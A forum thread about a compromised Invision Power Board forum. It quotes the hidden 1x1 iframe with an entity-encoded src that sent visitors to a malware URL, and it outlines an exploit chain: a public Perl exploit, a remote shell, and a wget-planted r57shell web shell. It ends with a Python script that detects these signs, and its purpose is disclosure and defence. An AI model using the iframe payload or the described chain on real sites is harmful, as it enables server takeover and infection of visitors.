Have the forums been hacked?



  Redmak said:

And is it just the forums or also the main page?

It's only the forums, not the main page. Anyways, the site should be taken offline until it's fixed, otherwise lots of people will be hacked. Also, and obviously, web pages don't just change themselves...

Lucky I am on my Mac! God this could be dangerous (I don't even have anti-virus for my non-internet connected laptop - I don't connect it to the internet so in most cases it doesn't matter). There isn't anything at http://zchxsikpgz.biz/. It is just the default Apache filler page! This is really bad. I hope it can be squashed soon.

Cal

  Quick Reply said:

<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#122;&#99;&#104;&#120;&#115;&#105;&#107;&#112;&#103;&#122;&#46;&#98;&#105;&#122;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#51;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>

When the HTML entities are decoded ("&#;"), it is http://zchxsikpgz.biz/dl/adv543.php

Didn't affect Firefox, had to fire up IE7 Beta 3 to see it, and NOD32 stopped it.

  Redmak said:

Can anyone post a selection of the source because I don't see it


I can confirm: Invision Power Board has been hacked.

That happened also to my forum at http://forum.wininizio.it

Useful notice for the admins: grep your server for the string "r57shell".

The hacker that attacked our website used this perl script: http://www.milw0rm.com/exploits/1720

The script attacks IPB up to v 2.1.5 but it could be improved to attack 2.1.6 also. The perl script can be locally executed (you just need a Perl environment in your system): it adds a post with a user account specifically added to begin the attack; the script then adds a new post with strange characters and finally it enables a remote shell. The hacker that attacked us placed a WGET command to upload a web shell (r57shell.php) that gives full control over the server, so he was able to modify the index.php file of any web application he found on our server.


  zipgenius said:
I can confirm: Invision Power Board has been hacked.

That happened also to my forum at http://forum.wininizio.it

Useful notice for the admins: grep your server for the string "r57shell".

The hacker that attacked our website used this perl script: http://www.milw0rm.com/exploits/1720

The script attacks IPB up to v 2.1.5 but it could be improved to attack 2.1.6 also. The perl script can be locally executed (you just need a Perl environment in your system): it adds a post with a user account specifically added to begin the attack; the script then adds a new post with strange characters and finally it enables a remote shell. The hacker that attacked us placed a WGET command to upload a web shell (r57shell.php) that gives full control over the server, so he was able to modify the index.php file of any web application he found on our server.

Additional info: this kind of attack uses the Invision folders that need to be chmod 0777 like /uploads or similar.
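The checks suggested in this thread, combined into one audit script as an added example (not code from any poster or from Invision): it walks a web root and reports world-writable directories, files containing the "r57shell" string, and iframes that are 0/1 px in size or carry an entity-encoded src. The function names, the five-entity threshold and the example.invalid sample URL are assumptions made for the illustration.

```python
import html, os, re, stat, sys, tempfile

IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR = re.compile(r"""(\w+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")
NUMREF = re.compile(r"&#x?[0-9a-f]+;", re.I)

def suspicious_iframes(text):
    """Decoded src of every iframe that is 0/1 px in size or has an entity-encoded src."""
    hits = []
    for tag in IFRAME.findall(text):
        attrs = {k.lower(): v.strip("\"'") for k, v in ATTR.findall(tag)}
        src = attrs.get("src", "")
        tiny = attrs.get("width") in ("0", "1") and attrs.get("height") in ("0", "1")
        encoded = len(NUMREF.findall(src)) >= 5  # assumed threshold
        if src and (tiny or encoded):
            hits.append(html.unescape(src).strip())
    return hits

def audit(webroot, marker=b"r57shell"):
    """Walk webroot; report world-writable dirs, files naming the marker, injected iframes."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        mode = stat.S_IMODE(os.stat(dirpath).st_mode)
        if mode & stat.S_IWOTH:
            findings.append(("world-writable", dirpath, oct(mode)))
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip it rather than abort the walk
            if marker in data:
                findings.append(("marker", path, marker.decode()))
            for src in suspicious_iframes(data.decode("utf-8", "replace")):
                findings.append(("iframe", path, src))
    return findings

if __name__ == "__main__":
    if len(sys.argv) > 1:
        root = sys.argv[1]
    else:  # constructed sample tree, not data from the thread
        root = tempfile.mkdtemp()
        enc = "".join(f"&#{ord(c)};" for c in "http://example.invalid/a.php")
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(f'<iframe src="{enc}" width=1 height=1></iframe>')
    for kind, path, detail in audit(root):
        print(f"{kind}\t{path}\t{detail}")
```

Pass the web root as the first argument to audit a real tree; a hit on any of the three checks is a lead to review by hand, not proof of compromise.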
